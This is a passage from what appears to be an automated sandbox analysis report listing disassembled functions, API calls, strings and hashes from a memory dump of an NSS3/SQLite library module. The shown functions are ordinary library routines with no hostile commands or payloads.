                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: memcpy$Error
                                                                                                                                                                                                                                                                                          • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                                                                                                          • API String ID: 3204416626-1906384322
                                                                                                                                                                                                                                                                                          • Opcode ID: 38adca646d509e42b0743941a89512c662769324517faee7f1c8fec286afe5cc
                                                                                                                                                                                                                                                                                          • Instruction ID: f5cac47f9738471c2ffb279ac65dc430d5863de22be3e9fe76d6a9908308d9da
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38adca646d509e42b0743941a89512c662769324517faee7f1c8fec286afe5cc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7024DA2E0C7C86EF7318671C64C3D76EE09B4632CF0D967EC5DE86683C7A858998351
                                                                                                                                                                                                                                                                                          Function 6C746C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C6F1C6F,00000000,00000004,?,?), ref: 6C746C3F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C6F1C6F,00000000,00000004,?,?), ref: 6C746C60
                                                                                                                                                                                                                                                                                          • PR_ExplodeTime.NSS3(00000000,6C6F1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C6F1C6F,00000000,00000004,?,?), ref: 6C746C94
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                                                                          • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                                          • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                                                                          • Opcode ID: 4a2d9826a3655fc4331cb3b889b75461b9c2d028eede9380ae0ad58bb869323d
                                                                                                                                                                                                                                                                                          • Instruction ID: 1a3d4b5ec46cd6b854e38e55bd1068d3240d48ba964e2b785a39bc6c42974206
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a2d9826a3655fc4331cb3b889b75461b9c2d028eede9380ae0ad58bb869323d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98515D72B016494FC71CCEADDC527DAB7DAABA4310F48C23AE441DB785D638E906C751
                                                                                                                                                                                                                                                                                          Function 6C7C0F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C7C1027
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7C10B2
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7C1353
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: memcpy$strlen
                                                                                                                                                                                                                                                                                          • String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                                                                                                                                                                                                          • API String ID: 2619041689-2155869073
                                                                                                                                                                                                                                                                                          • Opcode ID: 38ba49d11002dd07d765aa034616427aae2e968c9d2c5b2430016eec3ae84741
                                                                                                                                                                                                                                                                                          • Instruction ID: 0896e86871cc6fc2716065841d9876e1e65901b05ebb50ca31d13ceff4ce1653
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38ba49d11002dd07d765aa034616427aae2e968c9d2c5b2430016eec3ae84741
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECE1AE71A083429FD710CF58C980A6BBBF1AF86348F14893DE99587B51E771E849CB83
                                                                                                                                                                                                                                                                                          Function 6C7C8FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7C8FEE
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7C90DC
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7C9118
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7C915C
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7C91C2
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7C9209
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                          • String ID: 3333$UUUU
                                                                                                                                                                                                                                                                                          • API String ID: 1967222509-2679824526
                                                                                                                                                                                                                                                                                          • Opcode ID: e88443ae80cb270a751d10983144c2871eb92370c756f03df256ceb95dd84954
                                                                                                                                                                                                                                                                                          • Instruction ID: e8a4a51d99a7680de3a6fa82bfea7f13ef7253b7e770e7d5a4957a0c4a9c55d9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e88443ae80cb270a751d10983144c2871eb92370c756f03df256ceb95dd84954
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51A18E72E001169FDB14CB68CD81B9EB7B5BB88328F194139D919B7381E736AC51CBE1
                                                                                                                                                                                                                                                                                          Function 6C680FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C67CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6DF9C9,?,6C6DF4DA,6C6DF9C9,?,?,6C6A369A), ref: 6C67CA7A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C67CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C67CB26
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C68103E
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C681139
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C681190
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C681227
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C68126E
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C68127F
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • delayed %dms for lock/sharing conflict at line %d, xrefs: 6C681267
                                                                                                                                                                                                                                                                                          • winAccess, xrefs: 6C68129B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                                                                                                                                                                                          • API String ID: 2733752649-1873940834
                                                                                                                                                                                                                                                                                          • Opcode ID: e6e776b905cd4ea29a2d611b579938d7229ba7e7fc27d98051e395a2c0ef3a8e
                                                                                                                                                                                                                                                                                          • Instruction ID: 21326d7ca5609df4bf5cfc408a77563a9ef80167c7bd8143efa52f7f523777f6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6e776b905cd4ea29a2d611b579938d7229ba7e7fc27d98051e395a2c0ef3a8e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B7126317062019BEB24DF24DC95A6A73B5FB8632CF544639E83587A80EB34D845C7EA
                                                                                                                                                                                                                                                                                          Function 6C68AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C7ACF46,?,6C67CDBD,?,6C7ABF31,?,?,?,?,?,?,?), ref: 6C68B039
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C7ACF46,?,6C67CDBD,?,6C7ABF31), ref: 6C68B090
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6C7ACF46,?,6C67CDBD,?,6C7ABF31), ref: 6C68B0A2
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,6C7ACF46,?,6C67CDBD,?,6C7ABF31,?,?,?,?,?,?,?,?,?), ref: 6C68B100
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,00000002,?,6C7ACF46,?,6C67CDBD,?,6C7ABF31,?,?,?,?,?,?,?), ref: 6C68B115
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6C7ACF46,?,6C67CDBD,?,6C7ABF31), ref: 6C68B12D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C679EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C68C6FD,?,?,?,?,6C6DF965,00000000), ref: 6C679F0E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C679EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C6DF965,00000000), ref: 6C679F5D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3155957115-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 16f4686d4cbb0e163b5dfc4e307303e0e5516d9b929584aaaa61232f1fc84753
                                                                                                                                                                                                                                                                                          • Instruction ID: 14b4563e08133cc0aeeea8de1a70a6f818a9c2f049710bb06e03e87b5dfe8238
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16f4686d4cbb0e163b5dfc4e307303e0e5516d9b929584aaaa61232f1fc84753
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5991E3B0A012058FDB24CF24CD84BABB7B1FF85308F144A3DE45697A91EB34E455CBA9
                                                                                                                                                                                                                                                                                          Function 6C75BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C75BD48
                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C75BD68
                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C75BD83
                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C75BD9E
                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C75BDB9
                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C75BDD0
                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C75BDEA
                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C75BE04
                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C75BE1E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AlgorithmPolicy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2721248240-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 377f35d2c596379c757934e1561d9fb50c0eb3bd31e7582595aeea7c616525dd
                                                                                                                                                                                                                                                                                          • Instruction ID: b4d682741f38c1b7c6a2262b0f4c0d6da26ea766258b317fbe88b468dbe06867
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 377f35d2c596379c757934e1561d9fb50c0eb3bd31e7582595aeea7c616525dd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8821C8BAF0038D57FB004A569E4BBAB36789B9174DF8C0034F916AE641EF10B438C6A5
                                                                                                                                                                                                                                                                                          Function 6C808D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C8514E4,6C7BCC70), ref: 6C808D47
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C808D98
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0F00: PR_GetPageSize.NSS3(6C6E0936,FFFFE8AE,?,6C6716B7,00000000,?,6C6E0936,00000000,?,6C67204A), ref: 6C6E0F1B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0F00: PR_NewLogModule.NSS3(clock,6C6E0936,FFFFE8AE,?,6C6716B7,00000000,?,6C6E0936,00000000,?,6C67204A), ref: 6C6E0F25
                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C808E7B
                                                                                                                                                                                                                                                                                          • htons.WSOCK32(?), ref: 6C808EDB
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C808F99
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C80910A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                                                                                                                          • String ID: %u.%u.%u.%u
                                                                                                                                                                                                                                                                                          • API String ID: 1845059423-1542503432
                                                                                                                                                                                                                                                                                          • Opcode ID: 8a69eb22328e5555c05112fdaca3f48ebf66f358f4cd4d2b3e7403b982e12370
                                                                                                                                                                                                                                                                                          • Instruction ID: ae7bde4cf7e621f449941c95b5f970335b5e50ada933fe50b11a9f29ae93c69b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a69eb22328e5555c05112fdaca3f48ebf66f358f4cd4d2b3e7403b982e12370
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E02BA31B052558FDB388F19CD68366BBB2EF82304F198A9AC8915BB92C379D945C790
                                                                                                                                                                                                                                                                                          Function 6C68EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                          • String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-1126224928
                                                                                                                                                                                                                                                                                          • Opcode ID: 166afa99fc1122335e1d3f6a180255f06e170e56b0fcb06b1e33cf5b9e0903a8
                                                                                                                                                                                                                                                                                          • Instruction ID: ad560d6a826f93e7ed371ad2e999e7ee443bcdbbcb85ce88f36252223d6d855d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 166afa99fc1122335e1d3f6a180255f06e170e56b0fcb06b1e33cf5b9e0903a8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B72D070E052058FDB14CF68C484BAABBF1FF49308F1482ADD815ABB52D775E846CBA5
                                                                                                                                                                                                                                                                                          Function 6C7A9C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(?,00000000,6C67C52B), ref: 6C7A9D53
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7AA035
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7AA114
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log$memcmp
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 717804543-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: 39d04b141db32fe116bb156b93570f754dbefeedf34760f7f2cc06af815cc722
                                                                                                                                                                                                                                                                                          • Instruction ID: 0ee90c2ac2c73e296a5ac541a5c03015854b473d6684a28f5e053a48b408679b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39d04b141db32fe116bb156b93570f754dbefeedf34760f7f2cc06af815cc722
